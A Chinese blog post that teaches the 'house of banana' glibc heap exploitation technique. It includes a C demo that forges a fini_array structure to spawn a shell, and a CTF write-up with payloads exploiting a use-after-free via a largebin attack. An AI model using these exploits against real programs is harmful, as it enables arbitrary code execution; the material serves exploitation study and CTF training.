条件:

1.任意地址写一个堆地址

2.触发exit函数

3.能泄露堆地址和基地址

原理:

伪造 fini_array 赋值用到的结构体 从而控制程序exit时的程序执行流

ld.so 中存在 _rtld_global指针,指向 rtld_global结构体 ,里面有 _dl_ns 结构体 ,这个结构体里面存储的是elf隔断的符号结构体, fini_array段 的结构体在 _dl_fini中被使用 ,伪造该结构体指针,可以使得array指向我们可控的数据区,从而布置下一系列函数,进而劫持程序的流,house of banana的思想就是利用large bin attack往rtld_global写入堆的地址,并事先在堆里伪造好rtld_global结构体,这样程序exit或者正常退出main函数时,便会执行到伪造的fini_array数组。

demo

#include <stdio.h>

#include <stdlib.h>

#include <stdint.h>

#include <string.h>

#include <unistd.h>

#include <assert.h>

void shell()

{

   system("/bin/sh");

}

uint64_t getLibcBase()

{

   uint64_t to;

   uint64_t from;

   char buf[0x400];

   FILE* file;

   sprintf(buf, "/proc/%d/maps",(int)getpid());

   file = fopen(buf, "r");

   while(fgets(buf, sizeof(buf), file))

   {

      if(strstr(buf,"libc")!=NULL)

      {

          sscanf(buf, "%lx-%lx", &from, &to);

          fclose(file);

          return from;

      }

   }

}

int main(){

	setvbuf(stdin,NULL,_IONBF,0);

	setvbuf(stdout,NULL,_IONBF,0);

	setvbuf(stderr,NULL,_IONBF,0);

	uint64_t libcBase = getLibcBase();

	uint64_t rtld_global = libcBase+0x23d060;

	uint64_t* next_node = (uint64_t*)(rtld_global-0x4b048);

	uint64_t *p1 = malloc(0x428); /* 为了触发 largebin attack */

	uint64_t *g1 = malloc(0x18);

	uint64_t *p2 = malloc(0x418); /* p1->size和p2->size必须不相同 */

	uint64_t *g2 = malloc(0x18);

	uint64_t fake = (uint64_t)p2-0x10;

	*(uint64_t*)(fake+0x28)  = fake;

	*(uint64_t*)(fake+0x31c) = 0x1c;

	*(uint64_t*)(fake+0x110) = fake+0x40;

	*(uint64_t*)(fake+0x48)  = fake+0x58;

	*(uint64_t*)(fake+0x58)  = (uint64_t)shell;

	*(uint64_t*)(fake+0x120) = fake+0x48;

	*(uint64_t*)(fake+0x50)  = 0x8;

	printf("libcBase is 0x%lx\n",libcBase);

	printf("rtld_global is 0x%lx\n",rtld_global);

	free(p1);

	uint64_t *g3 = malloc(0x438); //force p1 insert in to the largebin

	free(p2);

	p1[3] = ((uint64_t)next_node -0x20); //push p2 into unsoteded bin

	uint64_t *g4 = malloc(0x438); //force p2 insert in to the largebin

	p2[1] = 0;

	p2[3] = fake;

	return 0;

}

largebinattack基本流程

2.31的libc

uint64_t *p1 = malloc(0x428); /* 为了触发 largebin attack */

uint64_t *g1 = malloc(0x18);

uint64_t *p2 = malloc(0x418); /* p1->size和p2->size必须不相同 */

uint64_t *g2 = malloc(0x18);

uint64_t fake = (uint64_t)p2-0x10;

让p1进入largebinattack ,再让p2进入unsortedbin,修改p1的fd_nextsize指针,触发largebinattack,然后把p2地址写入next_node之中

free(p1);

uint64_t *g3 = malloc(0x438); //force p1 insert in to the largebin

free(p2);

p1[3] = ((uint64_t)next_node -0x20); //push p2 into unsoteded bin

uint64_t *g4 = malloc(0x438); //force p2 insert in to the largebin

接下来就是布置link_mmap结构体

*(uint64_t*)(fake+0x28)  = fake;

*(uint64_t*)(fake+0x31c) = 0x1c;

*(uint64_t*)(fake+0x110) = fake+0x40;

*(uint64_t*)(fake+0x48)  = fake+0x58;

*(uint64_t*)(fake+0x58)  = (uint64_t)shell;

*(uint64_t*)(fake+0x120) = fake+0x48;

*(uint64_t*)(fake+0x50)  = 0x8;

例题

上周打的邑网杯决赛,线下有一个题目刚好是uaf的,largebin attack

漏洞分析

add函数

申请0x420-0x550堆块,堆块size错误会触发exit函数

delete函数

存在uaf漏洞

show功能正常

edit函数也能正常使用,delete没有清空size

思路:泄露堆地址和基地址之后,触发largebinattack往next_node写入堆地址,再利用uaf往堆地址中伪造结构体,最后输入错误size触发exit函数

泄露堆和基地址

add(0,0x520)

add(1,0x508)

add(2,0x510)

add(3,0x500)

free(0)

free(2)

show(2)

heap_base = h64() - 0x290

add(4,0x510)# 2&4 unsortedbin

free(2)

show(0)# largebin

libc_base = l64() - 0x1ed010

接下来又是熟悉的largebin attack环节

payload = p64(libc_base+ 0x1ed010)*2+p64(heap_base+0x290)+p64(next_node-0x20)

edit(0, payload)

add(5,0x550)# 2&4 into largebin & largebin attack

往next_node中写入堆地址

接下来就是往heap中布置结构体了

og=libc_base+0xe3afe

heap2_addr=heap_base+0xcd0

fake_addr=heap2_addr

pl = p64(0)*3 + p64(fake_addr)

pl = pl.ljust(0x38,b'\x00')+p64(fake_addr+0x58)+p64(8)+p64(og)

pl = pl.ljust(0x100,b'\x00')+p64(fake_addr+0x40)

pl = pl.ljust(0x110,b'\x00')+p64(fake_addr+0x48)

pl = pl.ljust(0x31c-0x10,b'\x00')+p64(0x1c) #0x314

edit(2,pl)

触发exit()

sla(b'>> ', b'1')

sla(b'much?\n', str(0x10))

house of banana的更多相关文章

  1. 再探banana

    在Solr图形化界面:除Hue之外的选择中列出了banana的如下一些不足,今天再次研究这些地方是否有方案可以解决. 1.sunburst图功能没法用. 2.中文有些地方会显示%2B%4C之类的一串字 ...

  2. Solr图形化界面banana:除Hue之外的选择

    最近Hue+Solr 方案原型验证有了一些进展.正好也收到了Google的大数据专家Sam的来件询问进展,我答复如下: Sam, 你好. 已经把Kafka+flume+solr的实时索引搭建起来了, ...

  3. hdu 1069 Monkey and Banana

    Monkey and Banana Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 65536/32768 K (Java/Others ...

  4. 杭电oj 1069 Monkey and Banana 最长递增子序列

    Monkey and Banana Time Limit: 2000/1000 MS (Java/Others) Memory Limit: 65536/32768 K (Java/Others)To ...

  5. HDU 1069---背包---Monkey and Banana

    HDU 1069 Description A group of researchers are designing an experiment to test the IQ of a monkey. ...

  6. HDU 1069 Monkey and Banana(二维偏序LIS的应用)

    ---恢复内容开始--- Monkey and Banana Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 65536/32768 K ...

  7. ACM-经典DP之Monkey and Banana——hdu1069

    ***************************************转载请注明出处:http://blog.csdn.net/lttree************************** ...

  8. HDU 1069 Monkey and Banana (DP)

    Monkey and Banana Time Limit:1000MS     Memory Limit:32768KB     64bit IO Format:%I64d & %I64u S ...

  9. HDU 1069 Monkey and Banana(动态规划)

    Monkey and Banana Problem Description A group of researchers are designing an experiment to test the ...

  10. (LightOJ 1004) Monkey Banana Problem 简单dp

    You are in the world of mathematics to solve the great "Monkey Banana Problem". It states ...

随机推荐

  1. 获取客户端真实IP备忘

    出于安全考虑,近期在处理一个记录用户真实IP的需求.本来以为很简单,后来发现没有本来以为的简单.这里主要备忘下,如果服务器处于端口回流(hairpin NAT),keepalived,nginx之后, ...

  2. 利用系统IO读取磁盘上指定BMP图片的宽和高,以及BMP图片的大小, 并输出到终端,要求图片名称通过命令行传递

    /************************************************* * * file name:GetBmpInfo.c * author :momolyl@126. ...

  3. 代码随想录Day15

    110.平衡二叉树 (优先掌握递归) 给定一个二叉树,判断它是否是 平衡二叉树 平衡二叉树 是指该树所有节点的左右子树的深度相差不超过 1. 示例 1: 输入:root = [3,9,20,null, ...

  4. springcloud经验

    >  码云地址:https://gitee.com/lpxs/lp-springcloud.git >  有问题可以多沟通:136358344@qq.com. 架构演化的步骤 在确定使用S ...

  5. C#模拟键盘输入、键状态和监听键盘消息

    模拟键盘输入 模拟键盘输入的功能需要依赖Windows函数实现,这个函数是SendInput,它是专门用来模拟键盘.鼠标等设备输入的函数. 另外和键盘输入相关的函数还有SendKeys,它是Syste ...

  6. HBuilder X在4K显示器怎么设置HBuilderX窗口本身的字体大小

    在使用HBuilder X编辑器的时候,使用笔记本自身的显示器,编辑器窗口本身的字体大小都正好,但是将HBuilder X编辑器用在外接显示器(高清)或者4K显示器上的时候,就不行了.怎么解决呢? 在 ...

  7. Mybatis骚操作-通用查询工具类

    老项目大多都有对JDBC进行了封装,可以直接执行SQL的工具类,在做项目升级改造的时候(这里仅指整合mybatis),要么全部调整成dao-xml的形式(会有改动代码多的问题,而且看代码时需要xml和 ...

  8. Angular 学习笔记 language service

    尝试 v10 rc 的时候, 突然 language service 不 work 了. ctrl + shift + p -> Show logs... 这样可以检查和 report issu ...

  9. ASP.NET Core – Filter

    介绍 Filter 类似 Middleware,只是它集中在处理 request 的前后, 站 MVC 角度看就是 before 和 after action, 站 Razor Pages 角度就是 ...

  10. Nacos 开启鉴权设置

    Nacos 开启鉴权设置 # 开启鉴权 nacos.core.auth.enabled=true nacos.core.auth.system.type=nacos # 开启鉴权之后,你可以自定义用于 ...